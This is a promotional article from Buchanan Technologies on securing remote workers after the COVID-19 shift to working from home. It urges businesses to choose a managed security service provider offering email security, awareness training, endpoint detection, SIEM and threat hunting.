By RJ Friedman, Buchanan Technologies
Remote workers are no longer the exception. The COVID-19 pandemic revolutionized the corporate workforce almost overnight by prompting even businesses that had been resisting work-from-home (WFH) policies to adopt the remote model.
WFH presented a quick solution to an unexpected problem. But it created new challenges – how to properly secure home-based environments. With so many new, hastily established connections to corporate networks, suddenly millions of new WFH employees needed to access corporate data to do their jobs. The network perimeters companies had spent decades hardening essentially disappeared, forcing them to find other ways to prevent unsafe user computing practices such as accessing malicious websites or opening infected attachments.
Hackers certainly took notice of the situation. The pandemic has fueled a frenzy of cybercrime. Social engineering, usually problematic, became an even bigger concern. According to Deloitte, 47% of individuals fall for a phishing scam while working at home.”
With many employees now working from home, it’s never been more important for businesses to employ a layered cybersecurity approach with a combination of technology, best practices, and user awareness.
Protecting remote, distributed environments can be a complex and daunting affair for most businesses. Thankfully, you don’t have to go it alone. Managed security service providers (MSSP) offer comprehensive cloud-based services to address some or all of your cybersecurity needs.
More and more businesses rely on MSSPs for cyber protection. But not all MSSPs have all the protection you need or the right fit for the business, so it pays to do your homework. When engaging an MSSP, look for comprehensive offerings that include the following:
To protect their data and networks, one of the most important areas businesses have to address is email security. Email is the most common attack surface as phishing campaigns with various degrees of sophistication constantly target users. In fact, over 80% of successful cyber-attacks include email as a threat vector, according to a multitude of sources.
Securing email in WFH environments isn’t much different from doing it in the office, except for managing a much larger number of sites. Still, hardening email security is a security priority for any company. There are many email security providers out there, and it’s important to make sure your MSSP can explain their vendor-selection process to find the one that stops the most unwanted mail, rather than the vendor that gives them the best profit margin. More specifically, you want to make sure your MSSP at least can incorporate modern technology like sandboxing, link protection, and integration with their SIEM solution. You also want to make sure they fully manage the solution for you, including responding to and potentially remediating threats they see coming in through email, rather than giving you more work to do.
Security Awareness Training
Attackers are usually brought into networks through phishing. While anti-phishing tools can stop most attempts, there’s always a chance one will slip by, tricking a well-intentioned user to click an infected attachment or compromised URL. Furthermore, there are many other threat vectors with which your users interact every day – the phone, web browsing, USB devices, even Bluetooth. This is why user awareness is critical to cybersecurity, especially in today’s WFH environment.
The most effective user awareness strategies involve multichannel approaches, with training delivered as email reminders, instructional videos, interactive online quizzes and games, and phishing simulations that identify users who need more help identifying and flagging potential phishing attempts. Without addressing the human factor, no cybersecurity strategy is complete.
Endpoint Detection And Response
Endpoint Detection and Response (EDR) goes beyond traditional AV, which relies only on malware signatures to prevent infection. Instead, EDR focuses on behavior analysis by continuously monitoring and collecting data at endpoints to identify and block suspicious or anomalous activity. Advanced endpoint protection is a must-have in today’s WFH world because in many cases your users’ endpoints now have much more direct access to the big, bad, worldwide web.
EDR looks at how code and processes behave and interact to determine if it’s acting suspiciously. An example would be an attachment that runs a script to initiate an attack or steal data. When EDR identifies a threat, it automatically switches to response mode to stop, contain, or remove the threat, and alert the security team.
For customers working with an MSSP, the provider’s security operations center (SOC) team would receive the alert and take appropriate action. An effective response team coordinates threat detection at the endpoint and network levels to minimize false positives and, in cases where customers also receive alerts, reduce the number of alerts to prevent “alert fatigue.”
As EDR does its work securing endpoints, businesses also need to look for threats everywhere else in the network. That’s where security information and event management (SIEM) software comes in. SIEM is a sort of omnipresent entity that captures and aggregates log data from network devices, applications, devices, host systems, and security controls across the network, correlating that data with threat intelligence sources to detect anomalies and potential attacks.
SIEM issues alert when it detects anomalies, and those alerts are then validated by an MSSP, who may or may not actually respond to attacks for their clients depending on the relationship agreement. SIEM also has reporting capabilities, which are handy for regulatory compliance by allowing businesses to build and keep detailed records of all activity across the environment. A well-coordinated security strategy would include routing EDR data to the SIEM for a comprehensive view of the environment. When researching MSSPs, find out if they have this capability, because most network-only SIEMs have become outdated with today’s WFH setup.
In searching for an MSSP, you’ll also want to inquire if they can do threat hunting, which consists of proactively searching for threats that evade your other defenses. Security experts agree that short of pulling the plug, there is no combination of defenses that will stop every attack. An advanced form of threat hunting supplements other security tools by continuously collecting and analyzing digital forensics data to determine if anything running or scheduled to run throughout the entire environment has any malicious capabilities. As such, it fits into a layered, in-depth cyber-defense strategy by generating intelligence that might otherwise be missed.
WFH environments are here to stay. Post pandemic, many businesses will opt to keep at least some of their WFH employees at home to save on overhead. More than half of Americans (54%) want to continue working from home, according to Pew research. Securing the remote workforce, therefore, is a long-term endeavor. And working with an MSSP is the way to go for a lot of businesses. Find out how Buchanan can help you.